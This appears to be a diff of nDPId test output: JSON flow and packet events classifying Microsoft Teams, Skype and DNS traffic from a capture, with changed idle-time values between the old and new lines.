+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":935,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1587041682106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682106,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux8AbuMg\/cIHSSRd4AQEAnLdwAAAQEICjCErYpWxwSg"} 
+00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682076,"flow_last_seen":1587041682107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1587041682107,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1587041682108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682108,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8CPlAAG0Gw100cktFwKgBBgG77H37toO1hXm5XaASIACQKwAAAgQFoAEDAwgEAggKVQ929DCErW0="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1587041682108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682108,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex9AbuFebld+7aDtoAQEAnOvQAAAQEICjCErYtVD3b0"} 
+00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682077,"flow_last_seen":1587041682108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041682108,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1587041682129,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1587041682129,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIVE8AAP8R4\/3AqAEGwKgBAcFqADUANJ5TmvIBAAABAAAAAAAABmNvbmZpZwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAE="} 
00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":969,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041682077,"flow_last_seen":1587041682140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6185,"flow_avg_l4_payload_len":618,"midstream":0,"thread_ts_msec":1587041682140,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","server_names":"*.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=*.asm.skype.com","alpn":"h2,http\/1.1","fingerprint":"B9:41:1D:AE:56:09:68:D2:07:D0:69:E1:68:00:08:2B:EF:63:1E:48"}} 
+01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":969,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041682077,"flow_last_seen":1587041682140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6185,"flow_avg_l4_payload_len":618,"midstream":0,"thread_ts_msec":1587041682140,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","server_names":"*.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=*.asm.skype.com","alpn":"h2,http\/1.1","fingerprint":"B9:41:1D:AE:56:09:68:D2:07:D0:69:E1:68:00:08:2B:EF:63:1E:48"}} 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1587041682143,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1587041682143,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC+wIdAADkR\/U\/AqAEBwKgBBgA1wWoAqgAAmvKBgAABAAQAAAAABmNvbmZpZwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAs5ACEGY29uZmlnBXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAOAAFAAEAAAALAB8MY29uZmlnLXRlYW1zBnMtMDAwNQhzLW1zZWRnZcBUwGUABQABAAAAOgACwHLAcgABAAEAAABoAAQ0ccKE"} 
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041682143,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.132"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682144,"flow_last_seen":1587041682144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682144,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1587041682144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682144,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx+AbuHxTqTAAAAALAC\/\/\/vlgAAAgQFtAEDAwUBAQgKMIStqwAAAAAEAgAA"} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1587041682156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682156,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0EIdAAHUGPJk0ccKEwKgBBgG77H5W9rKzh8U6lIAS\/\/\/8MgAAAgQFoAEDAwgBAQQC"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1587041682156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682156,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx+AbuHxTqUVvaytFAQIAAc8gAA"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682144,"flow_last_seen":1587041682157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682157,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01224{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1001,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041682144,"flow_last_seen":1587041682172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6166,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1587041682172,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682144,"flow_last_seen":1587041682144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682144,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1587041682144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682144,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx+AbuHxTqTAAAAALAC\/\/\/vlgAAAgQFtAEDAwUBAQgKMIStqwAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1587041682156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682156,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0EIdAAHUGPJk0ccKEwKgBBgG77H5W9rKzh8U6lIAS\/\/\/8MgAAAgQFoAEDAwgBAQQC"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1587041682156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682156,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx+AbuHxTqUVvaytFAQIAAc8gAA"} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682144,"flow_last_seen":1587041682157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682157,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01224{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1001,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041682144,"flow_last_seen":1587041682172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6166,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1587041682172,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1587041682355,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041682355,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPcIEAAP8Rx8TAqAEGwKgBAf9rADUAOydaEDoBAAABAAAAAAAADm5vcnRoZXVyb3BlY25zDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682369,"flow_last_seen":1587041682369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682369,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1587041682369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682369,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex\/Abv2sXoGAAAAALAC\/\/+1wwAAAgQFtAEDAwUBAQgKMISugAAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682369,"flow_last_seen":1587041682369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682369,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1587041682369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682369,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex\/Abv2sXoGAAAAALAC\/\/+1wwAAAgQFtAEDAwUBAQgKMISugAAAAAAEAgAA"} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1587041682370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1587041682370,"pkt":"KDc3AG3IEBMx8Tl2CABFAACdUKtAADkRbU3AqAEBwKgBBgA1\/2sAiQAAEDqBgAABAAIAAAAADm5vcnRoZXVyb3BlY25zDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQABwAwABQABAAAA5AAyEW5vcnRoZXVyb3BlY25zLTMyC25vcnRoZXVyb3BlCGNsb3VkYXBwBWF6dXJlA2NvbQDAPwABAAEAAAAEAAQ0ckww"} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041682370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.76.48"}} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682376,"flow_last_seen":1587041682376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682376,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1587041682376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682376,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+GfAqAEGNHJMMOyAAbuusi7sAAAAALAC\/\/9JyAAAAgQFtAEDAwUBAQgKMISuhQAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1587041682420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682420,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8cKZAAGwGWtQ0ck0hwKgBBgG77H8VHmMl9rF6B6ASIAAZOgAAAgQFoAEDAwgEAggKYQa0RDCEroA="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1587041682420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682420,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex\/Abv2sXoHFR5jJoAQEAlXvgAAAQEICjCErqxhBrRE"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1155,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682369,"flow_last_seen":1587041682420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 